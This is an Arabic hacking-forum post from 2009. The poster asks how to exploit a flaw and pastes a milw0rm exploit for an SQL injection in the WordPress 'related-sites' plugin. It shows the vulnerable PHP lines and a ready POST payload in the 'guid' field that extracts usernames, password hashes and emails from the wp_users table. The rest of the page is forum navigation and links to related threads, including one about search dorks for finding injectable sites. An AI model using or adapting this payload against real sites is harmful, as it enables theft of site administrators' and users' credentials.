يا شباب مين بدهـ يساعدني يجزيه الخير..

07-10-2009, 10:59 PM

رقم المشاركة : 1

معلومات العضو

genious

إحصائية العضو

genious غير متواجد حالياً

إحصائية الترشيح

عدد النقاط : 10
genious is on a distinguished road

يا شباب مين بدهـ يساعدني يجزيه الخير..

كيف يمكن استغلال هذه التغرة

كود:

http://wordpress.org/extend/plugins/related-sites/
/wp-*******/plugins/related-sites/BTE_RW_webajax.php

eLwaux(c) 30.05.2009, uasc.org.ua


SQL-Inj

27:  $guid = $_POST['guid'];
28:  $click = $_POST['click'];
31:  $ref = $_SERVER["HTTP_REFERER"];
40:  if ($guid!="" && $click!="" && $hostname!="" && $ipaddr!="" && $ref!="") {
53:   $sql = "INSERT INTO $clicks_table_name (guid,click) VALUES ('$guid','$clickinfo')";
55:  }

exploit:
POST: guid = 0', (select concat_ws(0x3a,user_login,user_pass,user_nicename,user_email) from wp_users where ID>0 and user_status=0 limit 1 ) );-- 
POST: click = .
HTTP_REFERER = .

# milw0rm.com [2009-06-30]

مواقع النشر (المفضلة)

« الموضوع السابق | الموضوع التالي »

أدوات الموضوع
مشاهدة صفحة طباعة الموضوع أرسل هذا الموضوع إلى صديق
انواع عرض الموضوع
الانتقال إلى العرض العادي الانتقال إلى العرض المتطور العرض الشجري

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة لا تستطيع الرد على المواضيع لا تستطيع إرفاق ملفات لا تستطيع تعديل مشاركاتك BB code is متاحة الابتسامات متاحة كود [IMG] متاحة كود HTML معطلة قوانين المنتدى

الانتقال السريع

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
dork = للبحث عن ثغرات sql تابع للدوره إلى بدهـ مواقع يتفضل هنا	Mr.rAiMoNr	SQL قواعد البيانات	22	03-26-2015 01:20 PM
شباب بليز شلون اسوي اميل roger.com@ بسرعة شباب محتاجة شرح تعليم او رابط	ThE_GhO$T	جـــ'ابات العناكــ'ب	2	11-11-2010 02:51 AM
[BBcode] : كم تبقى على رمضان شهر الخير ومسابقة رمضان شهر الخير	xman2	قســم تطويــر المــــواقع	0	08-12-2009 10:51 PM
مشكلة كبيرة يا شباب مين بدهـ يساعدني يجزيه الخير..	V!P	جـــ'ابات العناكــ'ب	5	07-08-2009 01:01 PM

الساعة الآن 01:19 AM